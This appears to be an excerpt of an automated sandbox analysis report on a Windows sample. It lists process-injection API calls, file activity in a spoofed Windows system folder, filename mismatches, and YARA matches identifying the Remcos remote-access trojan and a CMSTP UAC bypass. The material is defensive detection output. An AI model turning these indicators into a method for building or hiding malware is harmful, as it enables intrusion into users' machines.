Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 11_2_00E5C1FA
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5A135 NtSetInformationFile, 11_2_00E5A135
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E46500 NtQueryInformationToken,NtQueryInformationToken, 11_2_00E46500
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E34E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 11_2_00E34E3B
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 11_2_00E44759
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E38730 NtQueueApcThread, 15_2_02E38730
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37A2C NtAllocateVirtualMemory, 15_2_02E37A2C
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 15_2_02E3DD70
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37D78 NtWriteVirtualMemory, 15_2_02E37D78
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37AC9 NtAllocateVirtualMemory, 15_2_02E37AC9
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E37A2A NtAllocateVirtualMemory, 15_2_02E37A2A
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 15_2_02E3DBB0
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 15_2_02E3DC8C
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E3DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 15_2_02E3DC04
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E38D6E GetThreadContext,SetThreadContext,NtResumeThread, 15_2_02E38D6E
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E38D70 GetThreadContext,SetThreadContext,NtResumeThread, 15_2_02E38D70
Contains functionality to communicate with device drivers
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E34C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 9_2_00E34C10
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D48788 CreateProcessAsUserW, 0_2_02D48788
Contains functionality to shutdown / reboot the system
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029358B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 6_2_029358B9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029558B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 19_2_029558B9
Creates files inside the system directory
Source: C:\Users\Public\alpha.pif File created: C:\Windows Jump to behavior
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64 Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
Detected potential crypto function
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF43CB 0_2_02DF43CB
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF83B0 0_2_02DF83B0
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D320C4 0_2_02D320C4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF419C 0_2_02DF419C
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DEE6E0 0_2_02DEE6E0
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DD4601 0_2_02DD4601
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF4628 0_2_02DF4628
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DCA4D5 0_2_02DCA4D5
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E0A490 0_2_02E0A490
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDE403 0_2_02DDE403
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDE53D 0_2_02DDE53D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C9DF 0_2_02D3C9DF
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D3C98F 0_2_02D3C98F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DE8907 0_2_02DE8907
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E09662 0_2_02E09662
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDD7E4 0_2_02DDD7E4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DED73A 0_2_02DED73A
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DD5B6F 0_2_02DD5B6F
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DE9FD9 0_2_02DE9FD9
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DF3F6D 0_2_02DF3F6D
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02E03CC9 0_2_02E03CC9
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D8BCF4 0_2_02D8BCF4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02DDDD5B 0_2_02DDDD5B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02946254 6_2_02946254
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02951377 6_2_02951377
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295D098 6_2_0295D098
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029720D2 6_2_029720D2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293D071 6_2_0293D071
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029561AA 6_2_029561AA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02957150 6_2_02957150
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029467CB 6_2_029467CB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296C739 6_2_0296C739
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293E5DF 6_2_0293E5DF
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02952A49 6_2_02952A49
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295C9DD 6_2_0295C9DD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295CE3B 6_2_0295CE3B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02960E20 6_2_02960E20
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02946E73 6_2_02946E73
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02946FAD 6_2_02946FAD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02972F00 6_2_02972F00
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02932F45 6_2_02932F45
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295CC0C 6_2_0295CC0C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02954D22 6_2_02954D22
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E374B1 9_2_00E374B1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44875 9_2_00E44875
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3540A 9_2_00E3540A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E34C10 9_2_00E34C10
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E54191 9_2_00E54191
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E39144 9_2_00E39144
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5695A 9_2_00E5695A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E43EB3 9_2_00E43EB3
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E45A86 9_2_00E45A86
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E5769E 9_2_00E5769E
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 9_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3D660 9_2_00E3D660
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E36E57 9_2_00E36E57
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E37A34 9_2_00E37A34
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3EE03 9_2_00E3EE03
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40BF0 9_2_00E40BF0
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40740 9_2_00E40740
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E36B20 9_2_00E36B20
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E374B1 11_2_00E374B1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44875 11_2_00E44875
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3540A 11_2_00E3540A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E34C10 11_2_00E34C10
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E54191 11_2_00E54191
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E39144 11_2_00E39144
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5695A 11_2_00E5695A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E43EB3 11_2_00E43EB3
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E45A86 11_2_00E45A86
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E5769E 11_2_00E5769E
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 11_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3D660 11_2_00E3D660
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E36E57 11_2_00E36E57
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E37A34 11_2_00E37A34
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3EE03 11_2_00E3EE03
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40BF0 11_2_00E40BF0
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40740 11_2_00E40740
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E36B20 11_2_00E36B20
Source: C:\Users\Public\xpha.pif Code function: 12_2_00841E26 12_2_00841E26
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: 15_2_02E220C4 15_2_02E220C4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02966254 19_2_02966254
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02971377 19_2_02971377
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297D098 19_2_0297D098
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029920D2 19_2_029920D2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295D071 19_2_0295D071
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029761AA 19_2_029761AA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02977150 19_2_02977150
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029667CB 19_2_029667CB
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298C739 19_2_0298C739
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295E5DF 19_2_0295E5DF
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02972A49 19_2_02972A49
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297C9DD 19_2_0297C9DD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297CE3B 19_2_0297CE3B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02980E20 19_2_02980E20
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02966E73 19_2_02966E73
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02966FAD 19_2_02966FAD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02992F00 19_2_02992F00
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02952F45 19_2_02952F45
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297CC0C 19_2_0297CC0C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02974D22 19_2_02974D22
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D489D0 appears 45 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02DB9677 appears 38 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D344DC appears 74 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D4894C appears 56 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02DEB540 appears 46 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D34860 appears 949 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D34500 appears 33 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: String function: 02D346D4 appears 244 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02953FB0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02973FB0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029220E7 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02921F66 appears 49 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029538A5 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029420E7 appears 39 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 029738A5 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe Code function: String function: 02941F66 appears 49 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: String function: 02E24860 appears 683 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: String function: 02E3894C appears 50 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Code function: String function: 02E246D4 appears 155 times
Sample file is different than original file name gathered from version info
Source: jW3NEKvxH1.exe Binary or memory string: OriginalFilename vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266110150.00000000023B5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002852000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Uses 32bit PE files
Source: jW3NEKvxH1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
